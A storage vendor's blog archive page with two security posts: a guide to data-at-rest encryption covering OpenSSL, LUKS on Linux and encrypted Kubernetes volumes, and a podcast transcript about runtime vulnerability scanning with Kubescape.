Security Archives | simplyblock
https://www.simplyblock.io/blog/tags/security/

Encryption At Rest: A Comprehensive Guide to DARE
https://www.simplyblock.io/blog/encryption-at-rest-dare/ (Tue, 17 Dec 2024)

TLDR: Data At Rest Encryption (DARE) is the process of encrypting data when stored on a storage medium. The encryption transforms the readable data (plaintext) into an encoded format (ciphertext) that can only be decrypted with knowledge about the correct encryption key.

Today, data is the “new gold” for companies. Data collection happens everywhere and at any time. The global amount of data collected is projected to reach 181 Zettabytes (that is 181 billion Terabytes) by the end of 2025, a whopping 23.13% increase over 2024.

That means data protection is becoming increasingly important. Hence, data security has become paramount for organizations of all sizes. One key aspect of data security protocols is data-at-rest encryption, which provides crucial protection for stored data.


Understanding Data-in-Use, Data-in-Transit, and Data-at-Rest

Before we go deep into DARE, let’s quickly discuss the three states of data within a computing system and infrastructure.

Figure 1: The three states of data in encryption

To start, any type of data is created inside an application. While the application holds onto it, it is considered data in use. That means data in use describes information actively being processed, read, or modified by applications or users.

For example, imagine you open a spreadsheet to edit its contents or a database to process a query. This data is considered “in use.” This state is often the most vulnerable, as the data must be in an unencrypted form for processing. However, technologies like confidential computing use encrypted memory so that even this data can be processed while staying protected.

Next, data in transit describes any information moving between locations, be it across the internet, within a private network, or between memory and processors. Examples include email messages being sent, files being downloaded, or database query results traveling between the database server and applications.

Last but not least, data at rest refers to any piece of information stored physically on a digital storage medium such as flash storage or a hard disk. Storage solutions like cloud storage, offline backups, and file systems also count as digital storage; hence, data stored in these services is data at rest, too. Think of files saved on your laptop’s hard drive or photos stored in cloud storage such as Google Drive, Dropbox, or similar.

Criticality of Data Protection

For organizations, threats to their data are omnipresent. They range from unfortunate human error, such as accidentally deleting important information, to coordinated ransomware attacks that encrypt your data and demand a ransom, to actual data leaks.

Especially with data leaks, most people think about external hackers copying data off of the organization’s network and making it public. However, this isn’t the only way data is leaked. There are many examples of Amazon S3 buckets left open without proper authorization, databases accessible from the outside world, or backup services being accessed by unauthorized parties.

Anyhow, organizations face increasing threats to their data security. Any data breach has consequences, which are categorized into four segments:

  1. Financial losses from regulatory fines and legal penalties
  2. Damage to brand reputation and loss of customer trust
  3. Exposure of intellectual property to competitors
  4. Compliance violations with regulations like GDPR, HIPAA, or PCI DSS

While data in transit is commonly protected through TLS (Transport Layer Security), data at rest encryption (or DARE) is often an afterthought. This is typically because the setup isn’t as easy and straightforward as it should be. It’s the “I can still do this afterward” effect: “What could possibly go wrong?”

However, data at rest is the most vulnerable of all. Data in use is often unprotected but very transient; while there is a chance of a leak, it is small. Data at rest, in contrast, persists for extended periods of time, giving attackers more time to plan and execute their attacks. Secondly, persistent data often contains the most valuable pieces of information, such as customer records, financial data, or intellectual property. And lastly, access to persistent storage exposes large amounts of data in a single breach, making it that much more interesting to attackers.

Understanding Data At Rest Encryption (DARE)

Simply put, Data At Rest Encryption (DARE) transforms stored data into an unreadable format that can only be read again with the appropriate decryption key. This ensures that the information isn’t readable even if unauthorized parties gain access to the storage medium.

That said, the strength of the encryption used is crucial. Many encryption algorithms once considered secure have been broken over time. Encrypting data once and taking for granted that unauthorized parties can never access it is a mistake. Data at rest encryption is an ongoing process, potentially involving re-encrypting information when stronger, more robust encryption algorithms become available.

Available Encryption Types for Data At Rest Encryption

Figure 2: Symmetric encryption (same encryption key) vs asymmetric encryption (private and public key)

Two encryption methods are generally available today for large-scale setups. While we look forward to quantum-safe encryption algorithms, a widely adopted solution has yet to be developed. Quantum-safe means that the encryption will resist breaking attempts from quantum computers.

Anyhow, the first typical type of encryption is symmetric encryption. It uses the same key for encryption and decryption. The most common symmetric encryption algorithm is AES, the Advanced Encryption Standard.

// Symmetric encryption (pseudocode): the same key encrypts and decrypts
const cipherText = encrypt(plaintext, encryptionKey);
const decrypted = decrypt(cipherText, encryptionKey);
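
To make this concrete, here is a minimal sketch using the OpenSSL command line. The file names and the passphrase are placeholders only; in a real setup the key would come from a key management solution rather than being typed on the command line.

# Encrypt a file with AES-256, deriving the key from a passphrase (the same key decrypts)
openssl enc -aes-256-cbc -pbkdf2 -in document.txt -out document.txt.enc -pass pass:my-secret-key

# Decrypt it again with the identical key
openssl enc -d -aes-256-cbc -pbkdf2 -in document.txt.enc -out document.decrypted.txt -pass pass:my-secret-key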

The second type of encryption is asymmetric encryption. Here, the encryption and decryption routines use different but related keys, generally referred to as the private key and the public key. As their names suggest, the public key can be publicly known, while the private key must be kept private. Both keys are mathematically connected and generally based on a hard-to-solve mathematical problem. Two standard algorithm families are essential: RSA (the Rivest–Shamir–Adleman cryptosystem) and elliptic-curve cryptography, best known through ECDSA (the Elliptic Curve Digital Signature Algorithm). While RSA is based on the prime factorization problem, elliptic-curve schemes are based on the discrete logarithm problem. Going into detail about those problems would take more than one additional blog post, though.

// Asymmetric encryption (pseudocode): encrypt with the public key, decrypt with the private key
const cipherText = encrypt(plaintext, publicKey);
const decrypted = decrypt(cipherText, privateKey);
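
The same idea as a hedged OpenSSL sketch with hypothetical file names. Note that RSA can only encrypt payloads smaller than its key size, which is one reason it is rarely used for bulk data.

# Generate an RSA key pair: the private key stays secret, the public key can be shared
openssl genrsa -out private.pem 4096
openssl rsa -in private.pem -pubout -out public.pem

# Anyone can encrypt a small message with the public key...
openssl pkeyutl -encrypt -pubin -inkey public.pem -in message.txt -out message.enc

# ...but only the holder of the private key can decrypt it
openssl pkeyutl -decrypt -inkey private.pem -in message.enc -out message.txt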

Encryption in Storage

The use cases for symmetric and asymmetric encryption are different. While considered more secure, asymmetric encryption is slower and typically not used for large data volumes. Symmetric encryption, however, is fast but requires the sharing of the encryption key between the encrypting and decrypting parties, making it less secure.

To encrypt large amounts of data and get the best of both worlds, security and speed, you often see a combination of both approaches: the symmetric encryption key is encrypted with an asymmetric encryption algorithm. After decrypting the symmetric key, it is used to encrypt or decrypt the stored data.
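
This pattern is commonly known as envelope encryption. Continuing the hypothetical OpenSSL examples from above, a rough sketch looks like this:

# 1. Generate a random symmetric data key for fast bulk encryption
openssl rand -hex 32 > data.key

# 2. Encrypt the large payload with the symmetric data key
openssl enc -aes-256-cbc -pbkdf2 -in payload.bin -out payload.bin.enc -pass file:./data.key

# 3. Wrap (encrypt) the small data key with the asymmetric public key for safe storage
openssl pkeyutl -encrypt -pubin -inkey public.pem -in data.key -out data.key.enc

# To read the data: unwrap the data key with the private key, then decrypt the payload
openssl pkeyutl -decrypt -inkey private.pem -in data.key.enc -out data.key
openssl enc -d -aes-256-cbc -pbkdf2 -in payload.bin.enc -out payload.bin -pass file:./data.key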

Simplyblock provides data-at-rest encryption directly through its Kubernetes CSI integration or via the CLI and API. Additionally, simplyblock can be configured to use a different encryption key per logical volume for the highest degree of security and multi-tenant isolation.

Key Management Solutions

Next to selecting the encryption algorithm, managing and distributing the necessary keys is crucial. This is where key management solutions (KMS) come in.

Generally, there are two basic types of key management solutions: hardware and software-based.

For hardware-based solutions, you’ll typically utilize an HSM (Hardware Security Module). These HSMs provide a dedicated hardware token (commonly a USB key) to store keys. They offer the highest level of security but need to be physically attached to systems and are more expensive.

Software-based solutions offer a flexible key management alternative. Almost all cloud providers offer their own KMS systems, such as Azure Key Vault, AWS KMS, or Google Cloud KMS. Additionally, third-party key management solutions are available when setting up an on-premises or private cloud environment.
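
As a hypothetical illustration of how such a software-based KMS is typically used, the commands below wrap and unwrap a locally generated data key with the AWS CLI. The key alias is an assumption made for this example, not an existing resource; Azure Key Vault and Google Cloud KMS follow the same pattern.

# Wrap a locally generated data key under a KMS-managed master key
# (alias/storage-encryption is a hypothetical key alias)
aws kms encrypt --key-id alias/storage-encryption --plaintext fileb://data.key \
    --query CiphertextBlob --output text | base64 --decode > data.key.enc

# Unwrap it again later; the KMS master key itself never leaves the service
aws kms decrypt --ciphertext-blob fileb://data.key.enc \
    --query Plaintext --output text | base64 --decode > data.key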

When managing more than a few encrypted volumes, you should implement a key management solution. That’s why simplyblock supports KMS solutions by default.

Implementing Data At Rest Encryption (DARE)

Simply put, you should have a key management solution in place before implementing data-at-rest encryption in your company. If you run in the cloud, I recommend using whatever the cloud provider offers. If you run on-premises, or the cloud provider doesn’t provide one, select one of the existing third-party solutions.

DARE with Linux

As the most popular server operating system, Linux offers two options when you want to encrypt data at rest. The first option works on a per-file basis, providing filesystem-level encryption.

Typical solutions for filesystem-level encryption are eCryptfs, a stacked filesystem that stores encryption information in the header of each encrypted file, and EncFS, a user-space filesystem that runs without special permissions. The benefit of eCryptfs is the ability to copy encrypted files to other systems without decrypting them first; as long as the target node has the necessary encryption key in its keyring, the file can be decrypted. Both solutions haven’t seen updates in many years, though, which is why I’d generally recommend the second option: block-level encryption.

Block-level encryption transparently encrypts the whole content of a block device (meaning, hard disk, SSD, simplyblock logical volume, etc.). Data is automatically decrypted when read. While there is VeraCrypt, it is mainly a solution for home setups and laptops. For server setups, the most common way to implement block-level encryption is a combination of dm-crypt and LUKS, the Linux Unified Key Setup.

Linux Data At Rest Encryption with dm-crypt and LUKS

The fastest way to encrypt a volume with dm-crypt and LUKS is via the cryptsetup tools.

Debian / Ubuntu / Derivates:

sudo apt install cryptsetup 

RHEL / Rocky Linux / Oracle:

sudo yum install cryptsetup-luks

Now, we need to enable encryption for our block device. In this example, we assume we already have a whole block device or a partition we want to encrypt.

Warning: The following command will delete all data from the given device or partition. Make sure you use the correct device file.

cryptsetup -y luksFormat /dev/xvda

I recommend always running cryptsetup with the -y parameter, which forces it to ask for the passphrase twice. If you misspelled it once, you’ll realize it now, not later.

Now open the encrypted device.

cryptsetup luksOpen /dev/xvda encrypted

This command will ask for the passphrase. The passphrase is not recoverable, so you better remember it.

Afterward, the device is ready to be used as /dev/mapper/encrypted. We can format and mount it.

mkfs.ext4 /dev/mapper/encrypted
mkdir /mnt/encrypted
mount /dev/mapper/encrypted /mnt/encrypted
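
Once you are done with the volume, or before detaching the underlying device, the reverse steps unmount the filesystem and close the LUKS mapping again (same device and mount point names as in the example above):

umount /mnt/encrypted
cryptsetup luksClose encrypted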

Data At Rest Encryption with Kubernetes

Kubernetes offers ephemeral and persistent storage as volumes. Those volumes can be statically or dynamically provisioned.

For pre-created and statically provisioned volumes, you can follow the above guide on encrypting block devices on Linux and make the already encrypted device available to Kubernetes.

However, Kubernetes doesn’t offer out-of-the-box support for encrypted and dynamically provisioned volumes. Encrypting persistent volumes is not in Kubernetes’s domain. Instead, it delegates this responsibility to its container storage provider, connected through the CSI (Container Storage Interface).

Note that not all CSI drivers support data-at-rest encryption, though! But simplyblock does!

Data At Rest Encryption with Simplyblock

Figure 3: Encryption stack for Linux: dm-crypt+LUKS vs Simplyblock

Due to the importance of DARE, simplyblock enables you to secure your data immediately through data-at-rest encryption. Simplyblock goes above and beyond with its features and provides a fully multi-tenant DARE feature set. That said, in simplyblock, you can encrypt multiple logical volumes (virtual block devices) with the same key or one key per logical volume.

The use cases are different. One key per volume enables the highest level of security and complete isolation, even between volumes. You want this when applications or teams must be fully encapsulated from each other.

Sharing the same encryption key across multiple volumes makes sense when you provide one key per customer. This ensures that customers are isolated from each other and that data cannot be accessed by other customers on shared infrastructure in the case of a configuration failure or similar incident.

To set up simplyblock, you can configure keys manually or utilize a key management solution. In this example, we’ll set up the keys manually. We also assume that simplyblock has already been deployed as your distributed storage platform and that the simplyblock CSI driver is available in Kubernetes.

First, let’s create our Kubernetes StorageClass for simplyblock. Deploy the YAML file via kubectl, just as any other type of resource.

apiVersion: storage.k8s.io/v1
kind: StorageClass
metadata:
    name: encrypted-volumes
provisioner: csi.simplyblock.io
parameters:
    encryption: "True"
    csi.storage.k8s.io/fstype: ext4
    ... other parameters
reclaimPolicy: Delete
volumeBindingMode: Immediate
allowVolumeExpansion: true
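
Assuming the manifest above was saved as encrypted-storageclass.yaml (the file name is just an example), deploying it is a single command:

kubectl apply -f encrypted-storageclass.yaml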

Secondly, we generate the two keys. Note down the results of the two commands.

openssl rand -hex 32   # Key 1
openssl rand -hex 32   # Key 2

Now, we can create our secret and Persistent Volume Claim (PVC).

apiVersion: v1
kind: Secret
metadata:
    name: encrypted-volume-keys
data:
    crypto_key1: 
    crypto_key2: 
---
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
    annotations:
        simplybk/secret-name: encrypted-volume-keys
    name: encrypted-volume-claim
spec:
    storageClassName: encrypted-volumes
    accessModes:
        - ReadWriteOnce
    resources:
        requests:
            storage: 200Gi

And we’re done. Whenever we use the persistent volume claim, Kubernetes will delegate to simplyblock and ask for the encrypted volume. If it doesn’t exist yet, simplyblock will create it automatically. Otherwise, it will just provide it to Kubernetes directly. All data written to the logical volume is fully encrypted.
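
To consume the encrypted volume from a workload, reference the claim like any other PVC. The following Pod is a minimal, hypothetical example; the container image and mount path are placeholders.

apiVersion: v1
kind: Pod
metadata:
    name: encrypted-volume-consumer
spec:
    containers:
        - name: app
          image: nginx:latest
          volumeMounts:
              - name: data
                mountPath: /usr/share/nginx/html
    volumes:
        - name: data
          persistentVolumeClaim:
              claimName: encrypted-volume-claim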

Best Practices for Securing Data at Rest

Implementing robust data encryption is crucial. In the best case, data should never exist in a decrypted state.

That said, data-in-use encryption is still complicated as of writing. However, solutions such as Edgeless Systems’ Constellation exist and make it possible using hardware memory encryption.

Data-in-transit encryption is commonly used today via TLS. If you don’t use it yet, there is no time to waste. Low-hanging fruit first.

Data-at-rest encryption in Windows, Linux, or Kubernetes doesn’t have to be complicated. Solutions such as simplyblock enable you to secure your data with minimal effort.

However, there are a few more things to remember when implementing DARE effectively.

Data Classification

Organizations should classify their data based on sensitivity levels and regulatory requirements. This classification guides encryption strategies and key management policies. A robust data classification system includes three things:

  • Sensitive data identification: Identify sensitive data through automated discovery tools and manual review processes. For example, personally identifiable information (PII) like social security numbers should be classified as highly sensitive.
  • Classification levels: Establish clear classification levels such as Public, Internal, Confidential, and Restricted. Each level should have defined handling requirements and encryption standards.
  • Automated classification: Implement automated classification tools to scan and categorize data based on content patterns and metadata.

Access Control and Key Management

Encryption is only as strong as the key management and permission control around it. If your keys are leaked, the strongest encryption is useless.

Therefore, it is crucial to implement strong access controls and key rotation policies. Additionally, regular key rotation helps minimize the impact of potential key compromises and, I hate to say it, employees leaving the company.

Monitoring and Auditing

Understanding potential risks early is essential. That’s why you must maintain comprehensive logs of all access to encrypted data and to the encryption keys or key management solution. Also, regular audits should be scheduled to look for suspicious activities.

In the best case, multiple teams run independent audits to prevent internal leaks through dubious employees. While it may sound harsh, there are situations in life where people take the wrong path. Not necessarily on purpose or because they want to.

Data Minimization

The most secure data is the data that isn’t stored. Hence, you should only store necessary data.

Apart from that, encrypt only what needs protection. While this sounds counterintuitive, it reduces the attack surface and the performance impact of encryption.

Data At Rest Encryption: The Essential Component of Data Management

Data-at-rest encryption (DARE) has become essential for organizations handling sensitive information. The rise in data breaches and increasingly stringent regulatory requirements make it vital to protect stored information. Additionally, with the rise of cloud computing and distributed systems, implementing DARE is more critical than ever.

Simplyblock integrates natively with Kubernetes to provide a seamless approach to implementing data-at-rest encryption in modern containerized environments. With our support for transparent encryption, your organization can secure its data without any application changes. Furthermore, simplyblock utilizes the standard NVMe over TCP protocol which enables us to work natively with Linux. No additional drivers are required. Use a simplyblock logical volume straight from your dedicated or virtual machine, including all encryption features.

Anyhow, for organizations running Kubernetes, whether in public clouds, private clouds, or on-premises, DARE serves as a fundamental security control. By following best practices and using modern tools like Simplyblock, organizations can achieve robust data protection while maintaining system performance and usability.

But remember that DARE is just one component of a comprehensive data security strategy. It should be combined with other security controls, such as access management, network security, and security monitoring, to create a defense-in-depth approach to protecting sensitive information.

That all said, by following the guidelines and implementations detailed in this article, your organization can effectively protect its data at rest while maintaining system functionality and performance.

As threats continue to evolve, having a solid foundation in data encryption becomes increasingly crucial for maintaining data security and regulatory compliance.

What is Data At Rest Encryption?

Data At Rest Encryption (DARE), or encryption at rest, is the encryption process of data when stored on a storage medium. The encryption transforms the readable data (plaintext) into an encoded format (ciphertext) that can only be decrypted with knowledge about the correct encryption key.

What is Data-At-Rest?

Data-at-rest refers to any piece of information written to physical storage media, such as flash storage or hard disk. This also includes storage solutions like cloud storage, offline backups, and file systems as valid digital storage.

What is Data-In-Use?

Data-in-use describes information actively being processed, read, or modified by applications or users. Any data created inside an application is considered data-in-use as long as the application holds onto it.

What is Data-In-Transit?

Data-in-transit describes any information moving between locations, such as data sent across the internet, moved within a private network, or transmitted between memory and processors.

Continuous vulnerability scanning in production with Oshrat Nir from ARMO
https://www.simplyblock.io/blog/continuous-vulnerability-scanning-in-production-with-video/ (Fri, 24 May 2024)

This interview is part of simplyblock’s Cloud Commute Podcast, available on YouTube, Spotify, iTunes/Apple Podcasts, Pandora, Samsung Podcasts, and our show site.

In this installment of the podcast, we’re joined by Oshrat Nir (Twitter/X, Personal Blog), a Developer Advocate from ARMO, who talks about the importance of runtime vulnerability scanning. See below for more information on what vulnerability scanning is, which vulnerability scanning tools exist, and how simplyblock uses vulnerability scanning. Also see the interview transcript at the end.

EP13: Continuous vulnerability scanning in production with Oshrat Nir from ARMO

Key Learnings

What is Vulnerability Scanning?

Vulnerability scanning is a security process that involves using automated tools to identify and evaluate security weaknesses in a computer system, network, or application. The main objective of vulnerability scanning is to find vulnerabilities that could potentially be exploited by attackers to gain unauthorized access, cause disruptions, or steal data. Here’s a more detailed breakdown of what vulnerability scanning entails:

Identification:

  • Asset Discovery: The process begins with identifying all the assets (servers, networks, applications, etc.) within the scope of the scan.
  • Cataloging: Creating a comprehensive list of these assets, including software versions, configurations, and open ports.

Scanning:

  • Automated Tools: Using specialized software tools that automatically scan the identified assets for known vulnerabilities. These tools often maintain a database of known vulnerabilities, which is regularly updated.
  • Types of Scans:

      • Network Scans: Focus on identifying vulnerabilities in network devices and configurations.
      • Host Scans: Target individual computers and servers to find vulnerabilities in operating systems and installed software.
      • Application Scans: Look for security weaknesses in web applications, APIs, and other software applications.

Analysis:

  • Vulnerability Database: Comparing scan results against a database of known vulnerabilities to identify matches.
  • Severity Assessment: Evaluating the severity of identified vulnerabilities based on factors like potential impact, exploitability, and exposure.

Reporting:

  • Detailed Reports: Generating reports that detail the vulnerabilities found, their severity, and recommendations for remediation.
  • Prioritization: Providing a prioritized list of vulnerabilities to address based on their potential impact on the organization.

Remediation:

  • Patch Management: Applying software updates and patches to fix the vulnerabilities.
  • Configuration Changes: Adjusting system and network configurations to eliminate vulnerabilities.
  • Mitigation Strategies: Implementing additional security measures, such as firewalls or intrusion detection systems, to mitigate the risk of exploitation.

Rescanning:

  • Verification: Conducting follow-up scans to ensure that previously identified vulnerabilities have been successfully addressed.
  • Continuous Monitoring: Implementing ongoing scanning to detect new vulnerabilities as they emerge.

What are some Vulnerability Scanning Tools?

There are various vulnerability scanning tools available, each with its own focus and strengths. The main types include:

  • Network Vulnerability Scanners
  • Web Application Scanners
  • Database Scanners
  • Cloud Vulnerability Scanners

Some of the most widely used tools include:

  • Tenable Nessus: Comprehensive vulnerability scanner for identifying and assessing vulnerabilities, misconfigurations, and malware across various systems.
  • OpenVAS: An open-source tool for vulnerability scanning and management, derived from Nessus.
  • Enterprise TruRisk™ Platform: A cloud-based service that offers continuous vulnerability scanning and compliance management, previously known as QualysGuard.
  • Rapid7 Nexpose: A real-time vulnerability management solution that helps in identifying, prioritizing, and remediating vulnerabilities.
  • Acunetix: Focused on web application security, it identifies vulnerabilities such as SQL injection, cross-site scripting, and other web-related issues.
  • IBM Security QRadar: A security information and event management (SIEM) solution that integrates vulnerability scanning and management.
  • OWASP ZAP (Zed Attack Proxy): An open-source tool aimed at finding vulnerabilities in web applications.
  • Nikto: An open-source web server scanner that checks for dangerous files, outdated server components, and other security issues.
  • ARMO Kubescape: An open-source Kubernetes security platform offering vulnerability and misconfiguration scanning, risk assessment, as well as reporting on security compliance. See our podcast episode with Oshrat Nir from ARMO.
  • Snyk: A platform providing vulnerability, misconfiguration, and code security scanning throughout the development process. See our podcast episode with Brian Vermeer from Snyk.

How does Simplyblock use Vulnerability Scanning?

Simplyblock employs vulnerability scanning to ensure the security and integrity of the cloud-based aspects of its storage solution. For the storage clusters, simplyblock works seamlessly with industry-standard vulnerability scanning solutions. That means that storage clusters running the simplyblock storage system inside the customer’s AWS account can be discovered, cataloged, and monitored for outdated software, misconfigurations, and other security risks. This involves using automated tools to identify, assess, and mitigate potential security threats across the infrastructure.

Transcript

Chris Engelbert: Welcome back to the next episode of simplyblock’s Cloud Commute podcast. This week, I have another guest from the security space, something that really is close to my heart. So thank you for being here, Oshrat. Is that actually correct? I forgot to ask up front.

Oshrat Nir: It’s hard to say my name correctly if you’re not a native Hebrew speaker, but Oshrat is close enough.

Chris Engelbert: Okay. It’s close enough. All right. I forgot to ask that. So maybe you do a quick introduction. Who are you? Where are you from? What do you do? And we’ll take it from there.

Oshrat Nir: So thanks, Chris, for having me. This is a great opportunity. My name is Oshrat Nir. I am currently the developer advocate for ARMO and Kubescape, which is our CNCF sandbox project. We have an enterprise and an open source platform that I look after. I’ve been at ARMO for a year and a half. I’ve been in cloud native for about 5.5 years. And before that, I worked in telco. And fun fact about me is that I lived on 3 continents before I was 9 years old.

Chris Engelbert: All right. We’ll come back to that. Or maybe just now. What do you mean you lived on 3 continents?

Oshrat Nir: I was born in Germany, which is Europe. Then I left Germany when I was nearly 3 and moved to the States. I lived in Philadelphia for 6 years. When I was 8.5 years old, I moved to Israel and that’s where I’ve been living since.

Chris Engelbert: All right. So you’re not-

Oshrat Nir: I don’t speak German.

Chris Engelbert: Fair enough.

Oshrat Nir: I tried to learn German when I was working for a German company. My friend at Giant, shout out to Giant Swarm. But no, they did a lot of good things for me, like introducing me to cloud native, but German was not one of them.

Chris Engelbert: I agree. I feel sad for everyone who has to learn German. The grammar is such a pain. Anyway, you said you work for ARMO. So tell us a little bit about ARMO, a little bit more than it’s open source or enterprise.

Oshrat Nir: Okay. So ARMO is a cybersecurity company. The co-founders are Shauli Rozen, who is now our CEO, and Ben Hirschberg, who is our CTO, and another co-founder who’s now on the board called Leonid Sandler. Originally, Leonid and Ben come from cybersecurity. They’ve been doing it since the 90s. They built out a really, really good product that required installing an agent in a cluster. It was highly intrusive and very resource intensive. It might’ve been a good idea, but it was like maybe, I don’t know, maybe five years ahead of its time because that was in the days where agent-less was the thing. And it kind of, it became a thing. Then what happened was that NSA and CISA came out with the guidelines for hardening Kubernetes. That was in August of 2021. They grabbed that idea and built an open source misconfiguration scanner based on that framework, and that’s Kubescape.

They built it out, and it went crazy within days. The star chart was nearly perpendicular. It got to thousands of stars very quickly. By the way, we are waiting to get to 10,000 stars. So if anybody uses and likes us, please, we really, really want to celebrate that 10K milestone. We reached 1,000, 3,000, 5,000 stars very quickly. Then we added more frameworks to the misconfiguration scanner, which include CIS benchmarks. I mean, everybody uses the benchmark. These were all things that allowed people to easily adhere to these frameworks and help with continuous compliance. But you can’t, I don’t know, Alice in Wonderland. I worked with Lewis Carroll. ‘You need to run in order to stay in place,’ said the Red Queen to Alice.

So we had to continue to develop the product into a platform because the misconfiguration scanner is not enough. Then we went into CD scanning, image scanning. So there’s image scanning, repository scanning, scan the cluster. We also have an agent-less flavor, which was the original way we worked. Then we decided, even though past experience showed that the market was good for that, to also develop an agent, an operator that you put on your cluster. Because things that you can see from inside the cluster are not the same as things you can see from outside the cluster. That’s really important in terms of security, because you don’t want blind spots. You want to have all your bases covered, if I were to use an American sports analogy. So you want to have everything covered. That’s how Kubescape continued to develop.

At the end of 2023, or yeah, it was December of 2023, no, sorry, December of 2022. We were accepted, Kubescape was accepted by the CNCF as a sandbox project. The first misconfiguration scanner in the CNCF. And we’re still there, happy, growing, and we’re at a bid for incubation. So if I do another plug here now, if you’re using Kubescape and you love it, please add yourself to the adopters list because we want to get to incubation in 2024. We only have 7 months to go, so yeah, please help us with that.

What happened when Kubescape was accepted into the CNCF, we had to break it out of our enterprise offerings, out of our commercial offering. So we broke it out, and now we have two offerings. We have ARMO platform, which is the enterprise offering. It’s either SaaS or as a private installation, whatever works. And of course, Kubescape, which is open source, free for all, anybody can use or contribute. It seems that people really know and love Kubescape. This is the impression I got from when I came back from Paris at the KubeCon. I mean, people stopped at the ARMO booth and said, “Oh, you’re Kubescape.” So yeah, Kubescape is very known. It’s a known brand, and people seem to like it, which is great.

Chris Engelbert: Right, right. So as I said, we just had a guest, like, I think 2 weeks ago, Brian Vermeer from Snyk. I just learned it’s actually pronounced Snyk [Sneak]. And they’re also in the security space. But from my understanding, ARMO is slightly different. So Snyk mostly looks at the developer and the build pipeline, trying to make sure that all possible vulnerabilities are found before you actually deploy. Common coding mistakes, like the typical SQL injection, all that kind of stuff is caught before it actually can get into production. But with the onsite or continuous online scanning, whatever you want to call it, ARMO is on the other side of these things, right? So why would you need that? Why would you want that continuous scanning? I mean, if there was no security issue, why would there be one in production at some point?

Oshrat Nir: Okay, so first, let’s kind of dial this a little back. Snyk talks about themselves as an AppSec company, and they look at things from the workload or application point of view, and then they work their way down. And they get informed by information from cloud providers, etc. ARMO is the other way around. We start from the infrastructure. Kubernetes infrastructure is like something that has never been before. I mean, Kubernetes is different. You can’t use legacy processes and tools to scan your Kubernetes because you just don’t get everything that you need. Kubernetes is ephemeral, it scales up, it scales down. Containers don’t last as long, so you don’t have time to test them. There’s a lot of things that you could do in the past and you can’t do with Kubernetes.

So the way we look at securing Kubernetes and by extension the applications or the workloads running on it is the fact that we start from the infrastructure. We work off of those frameworks, best practices that we talked about, and we use runtime to inform our security because one of the main problems that people securing Kubernetes have is the fact that if they work according to best practices, their applications break or may break. And what you need to do is understand application behavior and then secure the infrastructure informed by that.

So it’s sort of a different perspective. We kind of do bottom up and Snyk does top down, and we kind of meet at the application, I would say, because I don’t think Snyk goes all the way down to Kubernetes and we don’t go all the way up to the SaaS or all of those four little acronyms that aren’t exactly in the Kubernetes world, but over Kubernetes.

Chris Engelbert: So as a company, I actually want both tools, right? I want the development side, the bottom up to make sure that I catch as much as possible before even going into production. And I want the top down approach in production to make sure that nothing happens at runtime, because I think ARMO also does compliance testing in terms of that my policies are correct. It looks for misconfiguration. So it looks much more on the operational side, stuff that a lot of the other tools, I think, will not necessarily catch easily.

Oshrat Nir: Correct. ARMO looks again, we are there throughout the software development lifecycle from the beginning, even to the point where you can do registry scanning and repo scanning and image scanning before. And then as you write things and as you build out your pipelines, you put security gateways in the pipelines using ARMO.

And an interesting thing, we have started to leverage eBPF a lot for many of the things that we do. In order to reduce the signal-to-noise ratio, one of the problems that there is in the world of DevOps and in the operations is alert fatigue, a lot of false positives. And people are so overwhelmed. And there’s also a missing piece, because again, even in the world of CVEs, when you’re judging things only by their CVSS, only by the severity and the score of the CVE, then you might not be as efficient as you need to be. Because sometimes you have a high severity vulnerability, somewhere, that doesn’t even get loaded into memory. So it’s not a problem that you have to deal with now. You can deal with it somewhere in the future when you have time, which is never, because nobody ever has time.

But the idea is, again, having production informing what happens in operation by saying, ‘Okay, this way the application or the workload needs to work, and this is why I care about this vulnerability and not that vulnerability.’

Chris Engelbert: Right, right.

Oshrat Nir: Now, speaking of that, ARMO is working on introducing, we already have this in beta in Kubescape, but it’s coming out at ARMO as well, on cloud-native detection and response, like runtime, or for runtime. So we have built out, since we’ve been working with the workload, since we’ve been using eBPF to see how applications are supposed to act so that we can secure the infrastructure without breaking the application, what we’re doing now is saying, ‘Okay, so now we know how the application needs to act’, so I can actually alert you on when it’s acting abnormally, and then we have anomaly detection. I can actually detect the fingerprints of malware, and then I can flag that and say, ‘Look, this might be problematic. You might be needing to look at this because you might have a virus,’ because people might be scanning CVEs. And sorry for the 90s reference, but I’m a Gen X-er, people might be scanning for CVEs, but they’re not looking for viruses on images. And that’s just the problem waiting to happen.

Chris Engelbert: Especially with something like the XZ issue just recently.

Oshrat Nir: There you go.

Chris Engelbert: And I think that probably opened the eyes of a lot of people, that to what extent or to what length people go to inject stuff into your application and take over either your build pipeline or your eventual production. I think in the XZ situation, it was like a backdoor that would eventually make it into production, so you have access to production systems.

Yeah, I agree. And you said another important thing, and I’m coming from a strong Java background. It’s about dynamically loading libraries or dependencies. And Java was like the prime example in the past. Not everything you had in your classpath was necessarily loaded into RAM or into memory. But you have the same thing for JavaScript, for PHP, for Python, and especially JavaScript, TypeScript, Python. Those are like the big comers, not newcomers, but the big comers or upcomers in terms of dynamic languages. So yeah, I get that. That is really interesting in the sense of you look at runtime and just because something is in your image doesn’t necessarily mean it’s bad. It’s going to be bad the second it’s loaded into memory and is available to the application. That makes a lot of sense. So you said ARMO runs inside the Kubernetes cluster, right? There’s an operator, I guess.

Oshrat Nir: Yeah.

Chris Engelbert: So do I need to be prepared for anything? Is there anything special I need to think about or is it literally you drop it in, and because it’s eBPF and agent-less it does all the magic for me and I don’t have to think about it at all. Like magic.

Oshrat Nir: Yeah, the idea is for you not to think about it. However, we do give users tools. Again, we’re very cognizant of alert fatigue because what happens is people are overwhelmed. So they’ll either work themselves to burnout or start ignoring things. Neither is a good option.

Okay, so what we want to do is thinking about the usability about the processes, not just the UX, but about the processes that are involved. So we have configurable security controls. You can quiet alerts for specific things, either forever, because this is a risk you’re willing to take. Or that’s just the way the app works and you can’t change it or you’re not changing for now.

